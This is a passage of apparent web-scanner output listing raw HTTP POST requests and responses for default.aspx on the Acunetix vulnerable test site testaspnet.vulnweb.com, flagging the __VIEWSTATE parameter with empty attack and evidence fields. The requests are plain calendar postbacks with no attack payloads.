Request Body - size: 1,119 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8309&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI%2Fo9oIHgJTRBYBBgAAOeI%2Fo9oIZGRkJa%2F%2FP4axwdj9BWTmdkKt1Lw%2FPpo%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKdhfLnCwLiidrKBQL%2BkPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr%2FDwKo4Jr%2FDwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD%2BhwoCqOD%2BhwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33%2BOIFAo33%2BOIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd%2BJCgLmnd%2BJCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY%2B9DQLmnY%2B9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gJNw2jYgDTpRk8YbaRDBoWeqgkq2Q%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:54:58 GMT Content-Length: 12597
Response Body - size: 12,597 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI/o9oIHgJTRBYBBgAAOeI/o9oIZGRkJa//P4axwdj9BWTmdkKt1Lw/Ppo=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKdhfLnCwLiidrKBQL+kPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr/DwKo4Jr/DwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD+hwoCqOD+hwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33+OIFAo33+OIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd+JCgLmnd+JCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY+9DQLmnY+9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gJNw2jYgDTpRk8YbaRDBoWeqgkq2Q==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">October 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:White" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8317')" style="color:Black" title="October 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8318')" style="color:Black" title="October 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8319')" style="color:Black" title="October 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8320')" style="color:Black" title="October 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8321')" style="color:Black" title="October 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8322')" style="color:Black" title="October 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8323')" style="color:Black" title="October 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8324')" style="color:Black" title="October 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8325')" style="color:Black" title="October 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8326')" style="color:Black" title="October 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8327')" style="color:Black" title="October 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8328')" style="color:Black" title="October 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8329')" style="color:Black" title="October 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8330')" style="color:Black" title="October 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8331')" style="color:Black" title="October 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8332')" style="color:Black" title="October 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8333')" style="color:Black" title="October 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8334')" style="color:Black" title="October 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8335')" style="color:Black" title="October 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8336')" style="color:Black" title="October 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8337')" style="color:Black" title="October 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1119 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,119 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8324&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI%2Fo9oIHgJTRBYBBgBAa14Jr9oIZGRkAKq1EXfjqe9y%2BK2WNP%2FgM6Ei6mw%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLv1YDjCwLiidrKBQL%2BkPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr%2FDwKo4Jr%2FDwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD%2BhwoCqOD%2BhwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33%2BOIFAo33%2BOIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd%2BJCgLmnd%2BJCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY%2B9DQLmnY%2B9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gLNq0cJmvZB%2F%2FiMsxYr6hC70xiGWw%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:37:59 GMT Content-Length: 12597
Response Body - size: 12,597 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI/o9oIHgJTRBYBBgBAa14Jr9oIZGRkAKq1EXfjqe9y+K2WNP/gM6Ei6mw=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLv1YDjCwLiidrKBQL+kPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr/DwKo4Jr/DwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD+hwoCqOD+hwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33+OIFAo33+OIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd+JCgLmnd+JCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY+9DQLmnY+9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gLNq0cJmvZB//iMsxYr6hC70xiGWw==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">October 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8317')" style="color:Black" title="October 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8318')" style="color:Black" title="October 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8319')" style="color:Black" title="October 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8320')" style="color:Black" title="October 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8321')" style="color:Black" title="October 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8322')" style="color:Black" title="October 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8323')" style="color:Black" title="October 15">15</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8324')" style="color:White" title="October 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8325')" style="color:Black" title="October 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8326')" style="color:Black" title="October 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8327')" style="color:Black" title="October 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8328')" style="color:Black" title="October 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8329')" style="color:Black" title="October 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8330')" style="color:Black" title="October 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8331')" style="color:Black" title="October 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8332')" style="color:Black" title="October 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8333')" style="color:Black" title="October 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8334')" style="color:Black" title="October 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8335')" style="color:Black" title="October 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8336')" style="color:Black" title="October 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8337')" style="color:Black" title="October 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1117 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
